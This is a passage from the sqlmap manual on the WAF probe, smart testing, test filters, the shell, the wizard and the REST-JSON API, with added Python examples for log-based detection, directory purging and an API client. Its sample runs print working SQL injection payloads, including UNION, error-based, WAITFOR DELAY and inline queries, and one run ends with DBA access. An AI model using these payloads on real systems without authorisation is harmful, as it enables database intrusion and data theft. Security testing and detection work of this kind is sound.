By default, sqlmap automatically sends, inside one of its initial requests, a dummy parameter value containing a deliberately “suspicious” SQL injection payload (e.g. ...&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1). If the target responds differently than for the original request, there is a high possibility that it is under some kind of protection. In case of any problems, the user can disable this mechanism by providing switch --skip-waf.
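The heuristic probe quoted above, together with the payload classes that appear in this section's sample runs (boolean AND n=n, WAITFOR DELAY, UNION ALL SELECT NULL..., CONVERT(INT,...), ROW(...)), is what the receiving side sees in its web server logs, and it is the signal a detection rule can key on. The following added example, not part of the original page and not sqlmap code, classifies constructed access-log lines (combined log format) by those signatures and reports which technique classes each source address exercised; the IP addresses, timestamps and paths are made up.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines. The query strings mirror the probe and payload
# shapes shown in this manual's sample runs; hosts, times and IPs are made up.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [10/Oct/2018:13:55:36 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2018:13:55:37 +0000] "GET /vuln.php?id=1&foobar=AND+1%3D1+UNION+ALL+SELECT+1%2C2%2C3%2Ctable_name+FROM+information_schema.tables+WHERE+2%3E1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2018:13:55:38 +0000] "GET /vuln.php?id=1+AND+2986%3D2986 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2018:13:55:39 +0000] "GET /vuln.php?id=1%3B+WAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1" 500 88 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2018:13:55:40 +0000] "GET /vuln.php?id=-7983+UNION+ALL+SELECT+NULL%2CNULL%2CNULL--+- HTTP/1.1" 200 600 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2018:13:56:00 +0000] "GET /vuln.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

REQUEST_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Ordered from most to least specific: the WAF probe also contains UNION ALL
# SELECT and AND 1=1, so it must be tested before the generic classes.
SIGNATURES = [
    ("waf-heuristic-probe", re.compile(r"information_schema\.tables\s+WHERE\s+2>1", re.I)),
    ("union-based", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("time-based", re.compile(r"\bWAITFOR\s+DELAY\b|\bSLEEP\s*\(|\bBENCHMARK\s*\(", re.I)),
    ("error-based", re.compile(
        r"\bCONVERT\s*\(\s*INT\b|\bEXTRACTVALUE\s*\(|\bUPDATEXML\s*\(|\bROW\s*\(\s*\d+", re.I)),
    ("boolean-based", re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
]


def classify_request(path: str):
    """Return the first matching signature label for a request path, or None."""
    decoded = unquote_plus(path)          # '+' and %XX back to the raw payload
    for label, pattern in SIGNATURES:
        if pattern.search(decoded):
            return label
    return None


def scan_access_log(text: str) -> list:
    """Return (ip, status, label) for every request that matches a signature."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_LINE.match(line)
        if not match:
            continue
        label = classify_request(match.group("path"))
        if label:
            hits.append((match.group("ip"), int(match.group("status")), label))
    return hits


def techniques_per_source(hits) -> dict:
    """Distinct technique classes seen per source IP. Several classes from one
    address in a short window is the footprint of an automated scanner rather
    than a single hand-typed request."""
    seen = defaultdict(set)
    for ip, _status, label in hits:
        seen[ip].add(label)
    return {ip: sorted(labels) for ip, labels in seen.items()}


if __name__ == "__main__":
    for ip, status, label in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{ip} {status} {label}")
    print(techniques_per_source(scan_access_log(SAMPLE_ACCESS_LOG)))
```

Decoding the query string before matching matters: the same payload arrives `+`-encoded, `%20`-encoded or raw depending on the client, and a rule written against the raw form alone misses the others. The per-source summary is the more useful alert; a single boolean-looking parameter can be a false positive, four different technique classes from one address within seconds rarely is.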

Imitate smartphone

Switch: --mobile

Sometimes web servers expose different interfaces toward mobile phones than to desktop computers. In such cases you can enforce usage of one of predetermined smartphone HTTP User-Agent header values. By using this switch, sqlmap will ask you to pick one of popular smartphones which it will imitate in current run.

Example run:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]

Work in offline mode (only use session data)

Switch: --offline

By using switch --offline sqlmap will use only previous session data in data enumeration. This basically means that there will be zero connection attempts during such run.

Safely remove all content from output directory

Switch: --purge-output

In case the user decides to safely remove all content from the output directory, which holds all target details from previous sqlmap runs, they can use switch --purge-output. While purging, all files from (sub)directories in folder output are overwritten with random data, truncated and renamed to random names, (sub)directories are renamed to random names too, and finally the whole directory tree is deleted.

Example run:

$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]
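The steps in that log (overwrite, truncate, rename files, rename directories, delete the tree) are a generic secure-purge procedure for test artifacts, and the following added example implements them on a scratch directory so the order of operations can be seen. This is an illustration written for this page, not sqlmap's implementation; demo_purge() builds a constructed tree under a temporary directory and purges it, and the file names inside it are made up. One caveat the log does not state: on journaling or copy-on-write file systems and on SSDs, overwriting in place does not guarantee that the old blocks are gone, so full-disk encryption of the machine holding the output directory is the reliable control.

```python
import os
import secrets
import shutil
import tempfile
from pathlib import Path


def _random_name() -> str:
    return secrets.token_hex(8)


def purge_directory(root) -> int:
    """Wipe a directory tree in the order the --purge-output log shows.

    Returns the number of regular files wiped. Symlinks are unlinked, never
    written through, so a planted link cannot redirect the overwrite.
    """
    root = Path(root)
    if not root.is_dir() or root.is_symlink():
        return 0
    wiped = 0
    # Bottom-up walk: every directory is fully processed before its parent
    # renames it, so no path we still need is invalidated.
    for dirpath, dirnames, filenames in os.walk(root, topdown=False):
        dirpath = Path(dirpath)
        for name in filenames:
            path = dirpath / name
            if path.is_symlink():
                path.unlink()
                continue
            try:
                os.chmod(path, 0o600)                        # changing file attributes
                with open(path, "r+b") as fh:                # writing random data
                    fh.write(secrets.token_bytes(path.stat().st_size))
                    fh.flush()
                    os.fsync(fh.fileno())
                with open(path, "wb"):                       # truncating files
                    pass
                path.rename(dirpath / _random_name())        # renaming filenames
                wiped += 1
            except OSError:
                continue
        for name in dirnames:
            sub = dirpath / name
            if not sub.is_symlink():
                sub.rename(dirpath / _random_name())         # renaming directory names
    shutil.rmtree(root, ignore_errors=True)                  # deleting the whole tree
    return wiped


def demo_purge() -> tuple:
    """Build a constructed output tree in a temp dir, purge it, report (wiped, still_exists)."""
    root = Path(tempfile.mkdtemp(prefix="purge-demo-"))
    (root / "target.example").mkdir()
    (root / "target.example" / "session.sqlite").write_bytes(b"\x00" * 4096)
    (root / "target.example" / "log").write_text("constructed log line\n")
    (root / "results.csv").write_text("table,column\n")
    wiped = purge_directory(root)
    return wiped, root.exists()


if __name__ == "__main__":
    print(demo_purge())
```

The fsync after the random write is what makes the overwrite reach the disk before the truncate and rename; without it the file system may coalesce the steps and never write the random bytes at all.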

Conduct thorough tests only if positive heuristic(s)

Switch: --smart

There are cases when the user has a large list of potential target URLs (e.g. provided with option -m) and wants to find a vulnerable target as fast as possible. If switch --smart is used, only parameters with which DBMS error(s) can be provoked are used further in scans; the others are skipped.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&use\
r=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might 
not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' migh
t not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be 
injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you 
want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and ri
sk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable 
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or
 HAVING clause' injectable 
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in
jectable 
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the 
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu
mns' injectable
[...]

Select (or skip) tests by payloads and/or titles

Option: --test-filter

In case that you want to filter tests by their payloads and/or titles you can use this option. For example, if you want to test all payloads which have ROW keyword inside, you can use --test-filter=ROW.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --b\
atch --test-filter=ROW
[...]
[xx:xx:39] [INFO] GET parameter 'id' is dynamic
[xx:xx:39] [WARNING] reflective value(s) found and filtering out
[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be 
injectable (possible DBMS: 'MySQL')
[xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
[xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or
 HAVING clause' injectable 
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 3 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELEC
T (C
    ASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FRO
M (S
    ELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY 
x)
---
[...]

Option: --test-skip=TEST

In case that you want to skip tests by their payloads and/or titles you can use this option. For example, if you want to skip all payloads which have BENCHMARK keyword inside, you can use --test-skip=BENCHMARK.

Interactive sqlmap shell

Switch: --sqlmap-shell

By using switch --sqlmap-shell user will be presented with the interactive sqlmap shell which has the history of all previous runs with used options and/or switches:

$ python sqlmap.py --sqlmap-shell
sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=\
BEU --batch
         _
 ___ ___| |_____ ___ ___  {1.0-dev-2188502}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable 
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at xx:xx:11

[xx:xx:11] [INFO] testing connection to the target URL
[xx:xx:12] [INFO] testing if the target URL is stable
[xx:xx:13] [INFO] target URL is stable
[xx:xx:13] [INFO] testing if GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] confirming that GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] heuristic (basic) test shows that GET parameter 'artist' might
 be injectable (possible DBMS: 'MySQL')
[xx:xx:13] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
ecific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending 
provided level (1) and risk (1) values? [Y/n] Y
[xx:xx:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:13] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - 
WHERE or HAVING clause' injectable 
[xx:xx:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[xx:xx:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause'
[xx:xx:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[xx:xx:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause (EXTRACTVALUE)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
 or GROUP BY clause (UPDATEXML)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXP)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E
XP)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
IGINT UNSIGNED)'
[xx:xx:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[xx:xx:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[xx:xx:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT 
UNSIGNED)'
[xx:xx:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[xx:xx:15] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[xx:xx:15] [INFO] ORDER BY technique seems to be usable. This should reduce the 
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[xx:xx:15] [INFO] target URL appears to have 3 columns in query
[xx:xx:16] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 2
0 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if
 any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 39 HTTP(s) re
quests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5707=5707

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
26d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
NULL,NULL-- -
---
[xx:xx:16] [INFO] testing MySQL
[xx:xx:16] [INFO] confirming MySQL
[xx:xx:16] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
[xx:xx:16] [INFO] fetched data logged to text files under '/home/stamparm/.sqlma
p/output/testphp.vulnweb.com'
sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner
         _
 ___ ___| |_____ ___ ___  {1.0-dev-2188502}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable 
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at xx:xx:25

[xx:xx:26] [INFO] resuming back-end DBMS 'mysql' 
[xx:xx:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5707=5707

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
26d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
NULL,NULL-- -
---
[xx:xx:26] [INFO] the back-end DBMS is MySQL
[xx:xx:26] [INFO] fetching banner
web application technology: Nginx, PHP 5.3.10
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5
banner:    '5.1.73-0ubuntu0.10.04.1'
[xx:xx:26] [INFO] fetched data logged to text files under '/home/stamparm/.sqlma
p/output/testphp.vulnweb.com' 
sqlmap-shell> exit

Simple wizard interface for beginner users

Switch: --wizard

For beginner users there is a wizard interface which uses a simple workflow with as few questions as possible. If the user just enters the target URL and uses the default answers (e.g. by pressing Enter), they should have a properly set up sqlmap run environment by the end of the workflow.

Example against a Microsoft SQL Server target:

$ python sqlmap.py --wizard

    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable 
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at xx:xx:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_in
t.asp?id=1
POST data (--data) [Enter for None]: 
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S
erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+C
HAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58
)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(1
00)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+
CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)-- 

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT 
(CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR
(109)+CHAR(113)+CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
    Oct 14 2005 00:33:37 
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user:    'sa'
current database:    'testdb'
current user is DBA:    True

[*] shutting down at xx:xx:52

API (REST-JSON)

sqlmap can be run through the REST-JSON API, an API (abbr. for Application Program Interface) that uses JSON for REST (abbr. for REpresentational State Transfer) communication between server and client instance(s). In plain terms, the server runs the sqlmap scan(s), while clients set the sqlmap options/switches and pull the results back. The main program file for running the API is sqlmapapi.py, while the client can also be implemented inside an arbitrary user program.

$ python sqlmapapi.py -hh
Usage: sqlmapapi.py [options]

Options:
  -h, --help            show this help message and exit
  -s, --server          Act as a REST-JSON API server
  -c, --client          Act as a REST-JSON API client
  -H HOST, --host=HOST  Host of the REST-JSON API server (default "127.0.0.1")
  -p PORT, --port=PORT  Port of the the REST-JSON API server (default 8775)
  --adapter=ADAPTER     Server (bottle) adapter to use (default "wsgiref")

The server is started by running sqlmapapi.py with switch -s, the client with switch -c, while in both cases the user can (optionally) set the listening IP address with option -H (default "127.0.0.1") and the listening port with option -p (default 8775). Each client’s “session” can have multiple “tasks” (i.e. sqlmap scan runs), where the user can arbitrarily choose which task should be currently active.

Inside the client’s command line interface available commands are:

  • help – showing list of available commands along with basic help information
  • new ARGS – starts a new scan task with provided arguments (e.g. new -u "http://testphp.vulnweb.com/artists.php?artist=1")
  • use TASKID – switches current context to different task (e.g. use c04d8c5c7582efb4)
  • data – retrieves and shows data for current task
  • log – retrieves and shows log for current task
  • status – retrieves and shows status for current task
  • stop – stops current task
  • kill – kills current task
  • list – displays all tasks (for current session)
  • flush – flushes (i.e. deletes) all tasks
  • exit – exits the client interface
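The sentence above says the client can be implemented inside a user program; the following added example (not sqlmap's code and not from the original page) shows what such a program looks like for the task lifecycle this section documents: /task/new, /scan/<taskid>/start, /status, /log and /data. The HTTP layer is injectable so the class can be exercised offline against canned replies shaped like the JSON printed further below; those replies, the engineid value and the "batch" option key are constructed, and the "taskid" field name in the /task/new reply is an assumption consistent with the 16-hex-character id the curl example greps out.

```python
import json
from urllib.request import Request, urlopen


def http_json(url: str, payload=None) -> dict:
    """Default transport: GET, or POST a JSON body when payload is given."""
    body = json.dumps(payload).encode() if payload is not None else None
    headers = {"Content-Type": "application/json"} if body else {}
    with urlopen(Request(url, data=body, headers=headers), timeout=30) as resp:
        return json.loads(resp.read().decode("utf-8"))


class SqlmapApiClient:
    """Minimal client for the endpoints shown in this section. Every reply is
    checked for "success" so a failed call raises instead of returning junk."""

    def __init__(self, base_url="http://127.0.0.1:8775", transport=http_json):
        self.base = base_url.rstrip("/")
        self.transport = transport

    def _call(self, path, payload=None):
        reply = self.transport(f"{self.base}{path}", payload)
        if not reply.get("success", False):
            raise RuntimeError(f"{path} failed: {reply}")
        return reply

    def new_task(self) -> str:
        return self._call("/task/new")["taskid"]        # assumed field name

    def start(self, taskid: str, options: dict) -> None:
        self._call(f"/scan/{taskid}/start", options)

    def status(self, taskid: str) -> str:
        return self._call(f"/scan/{taskid}/status")["status"]

    def log(self, taskid: str, levels=None) -> list:
        entries = self._call(f"/scan/{taskid}/log")["log"]
        return [e for e in entries if e["level"] in levels] if levels else entries

    def data(self, taskid: str) -> list:
        return self._call(f"/scan/{taskid}/data")["data"]


# Constructed canned replies, shaped like the JSON the api client prints below.
CANNED = {
    "/task/new": {"success": True, "taskid": "a42ddaef02e976f0"},
    "/scan/a42ddaef02e976f0/start": {"success": True, "engineid": 4242},
    "/scan/a42ddaef02e976f0/status": {"status": "terminated", "returncode": 0, "success": True},
    "/scan/a42ddaef02e976f0/log": {"success": True, "log": [
        {"message": "flushing session file", "level": "INFO", "time": "12:48:10"},
        {"message": "testing connection to the target URL", "level": "INFO", "time": "12:48:10"},
        {"message": "reflective value(s) found and filtering out", "level": "WARNING", "time": "12:48:11"},
    ]},
    "/scan/a42ddaef02e976f0/data": {"success": True, "data": [], "error": []},
}


def canned_transport(url, payload=None):
    """Offline stand-in for http_json: answers from CANNED by URL path."""
    return CANNED["/" + url.split("/", 3)[3]]


def run_demo(client=None) -> dict:
    """Drive one task end to end and summarise it (canned transport by default)."""
    client = client or SqlmapApiClient(transport=canned_transport)
    taskid = client.new_task()
    client.start(taskid, {"url": "http://testphp.vulnweb.com/artists.php?artist=1", "batch": True})
    return {
        "taskid": taskid,
        "status": client.status(taskid),
        "warnings": [e["message"] for e in client.log(taskid, levels={"WARNING", "ERROR", "CRITICAL"})],
        "rows": len(client.data(taskid)),
    }


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Swapping canned_transport for http_json points the same code at a live sqlmapapi.py server. Note that the task endpoints carry no authentication of their own (the Admin ID printed at server start protects only the admin endpoints), so a server started with -H "0.0.0.0" as in the example below accepts tasks from anything that can reach port 8775; keep it on a loopback or firewalled interface.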

Example server run:

$ python sqlmapapi.py -s -H "0.0.0.0"
[12:47:51] [INFO] Running REST-JSON API server at '0.0.0.0:8775'..
[12:47:51] [INFO] Admin ID: 89fd118997840a9bd7fc329ab535b881
[12:47:51] [DEBUG] IPC database: /tmp/sqlmapipc-SzBQnd
[12:47:51] [DEBUG] REST-JSON API server connected to IPC database
[12:47:51] [DEBUG] Using adapter 'wsgiref' to run bottle
[12:48:10] [DEBUG] Created new task: 'a42ddaef02e976f0'
[12:48:10] [DEBUG] [a42ddaef02e976f0] Started scan
[12:48:16] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:50] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:55] [DEBUG] [a42ddaef02e976f0] Retrieved scan log messages
[12:48:59] [DEBUG] [a42ddaef02e976f0] Retrieved scan data and error messages

Example client run:

$ python sqlmapapi.py -c -H "192.168.110.1"
[12:47:53] [DEBUG] Example client access from command line:
    $ taskid=$(curl http://192.168.110.1:8775/task/new 2>1 | grep -o -I '[a-f0-9
]\{16\}') && echo $taskid
    $ curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testp
hp.vulnweb.com/artists.php?artist=1"}' http://192.168.110.1:8775/scan/$taskid/st
art
    $ curl http://192.168.110.1:8775/scan/$taskid/data
    $ curl http://192.168.110.1:8775/scan/$taskid/log
[12:47:53] [INFO] Starting REST-JSON API client to 'http://192.168.110.1:8775'..
.
[12:47:53] [DEBUG] Calling http://192.168.110.1:8775
[12:47:53] [INFO] Type 'help' or '?' for list of available commands
api&gt; ?
help        Show this help message
new ARGS    Start a new scan task with provided arguments (e.g. 'new -u "http://
testphp.vulnweb.com/artists.php?artist=1"')
use TASKID  Switch current context to different task (e.g. 'use c04d8c5c7582efb4
')
data        Retrieve and show data for current task
log         Retrieve and show log for current task
status      Retrieve and show status for current task
stop        Stop current task
kill        Kill current task
list        Display all tasks
flush       Flush tasks (delete all tasks)
exit        Exit this client
api&gt; new -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner --flush-s
ession
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/task/new
[12:48:10] [INFO] New task ID is 'a42ddaef02e976f0'
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/start
[12:48:10] [INFO] Scanning started
api (a42ddaef02e976f0)&gt; status
[12:48:16] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/statu
s
{
    "status": "running", 
    "returncode": null, 
    "success": true
}
api (a42ddaef02e976f0)> status
[12:48:50] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/status
{
    "status": "terminated", 
    "returncode": 0, 
    "success": true
}
